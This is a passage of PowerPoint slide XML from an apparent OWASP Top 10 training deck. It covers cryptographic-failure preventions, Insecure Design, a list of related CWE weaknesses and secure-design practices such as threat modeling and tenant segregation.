              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Apply required security controls as per the data classification.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Do not use legacy protocols such as FTP and SMTP for transporting sensitive data.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Store passwords using strong adaptive and salted hashing functions with a work factor (delay factor), such as Argon2, scrypt, bcrypt or PBKDF2.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Initialization vectors must be chosen appropriate for the mode of operation. For many modes, this means using a CSPRNG (cryptographically secure pseudo random number generator). For modes that require a nonce, then the initialization vector (IV) does not need a CSPRNG. In all cases, the IV should never be used twice for a fixed key.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Always use authenticated encryption instead of just encryption.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Keys should be generated cryptographically randomly and stored in memory as byte arrays. If a password is used, then it must be converted to a key via an appropriate password base key derivation function.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure that cryptographic randomness is used where appropriate, and that it has not been seeded in a predictable way or with low entropy. Most modern APIs do not require the developer to seed the CSPRNG to get security.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Avoid deprecated cryptographic functions and padding schemes, such as MD5, SHA1, PKCS number 1 v1.5 .</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Verify independently the effectiveness of configuration and settings.</a:t>
            </a:r>
            <a:endParaRPr sz="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Insecure Design</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46" name="Google Shape;146;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Insecure design is a broad category representing many different weaknesses as a result of missing or ineffective control design.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The design phase of the development lifecycle should gather all the security requirements with the help of an AppSec professional to help </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>evaluate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and design security and privacy controls.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insecure Design</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Information Leakage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File Upload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Google Shape;147;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4836750" y="3031625"/>
            <a:ext cx="4307250" cy="2111875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p24"/>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4</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CWEs and Preventions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Insecure Design</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p25"/>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CWE-73 External Control of File Name or Path</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-183 Permissive List of Allowed Inputs</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-209 Generation of Error Message Containing Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-213 Exposure of Sensitive Information Due to Incompatible Policies</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-235 Improper Handling of Extra Parameters</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-256 Unprotected Storage of Credentials</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-257 Storing Passwords in a Recoverable Format</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-266 Incorrect Privilege Assignment</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-269 Improper Privilege Management</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-280 Improper Handling of Insufficient Permissions or Privileges</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-311 Missing Encryption of Sensitive Data</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-312 Cleartext Storage of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-313 Cleartext Storage in a File or on Disk</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-316 Cleartext Storage of Sensitive Information in Memory</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-419 Unprotected Primary Channel</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-430 Deployment of Wrong Handler</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-434 Unrestricted Upload of File with Dangerous Type</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-451 User Interface (UI) Misrepresentation of Critical Information</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-472 External Control of Assumed-Immutable Web Parameter</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-501 Trust Boundary Violation</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-522 Insufficiently Protected Credentials</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-525 Use of Web Browser Cache Containing Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-539 Use of Persistent Cookies Containing Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-579 J2EE Bad Practices: Non-serializable Object Stored in Session</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-598 Use of GET Request Method With Sensitive Query Strings</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-602 Client-Side Enforcement of Server-Side Security</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-642 External Control of Critical State Data</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-646 Reliance on File Name or Extension of Externally-Supplied File</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-650 Trusting HTTP Permission Methods on the Server Side</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-653 Insufficient Compartmentalization</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-656 Reliance on Security Through Obscurity</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4831925" y="2634575"/>
            <a:ext cx="3542400" cy="1938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Establish and use a secure development lifecycle with AppSec professionals to help evaluate and design security and privacy-related controls</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Establish and use a library of secure design patterns or paved road ready to use components</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Use threat modeling for critical authentication, access control, business logic, and key flows</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Integrate security language and controls into user stories</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Integrate plausibility checks at each tier of your application (from frontend to backend)</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Write unit and integration tests to validate that all critical flows are resistant to the threat model. Compile use-cases and misuse-cases for each tier of your application.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Segregate tier layers on the system and network layers depending on the exposure and protection needs</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Segregate tenants robustly by design throughout all tiers</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Limit resource consumption by user or service</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Google Shape;156;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4831925" y="1285600"/>
            <a:ext cx="3000000" cy="999600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
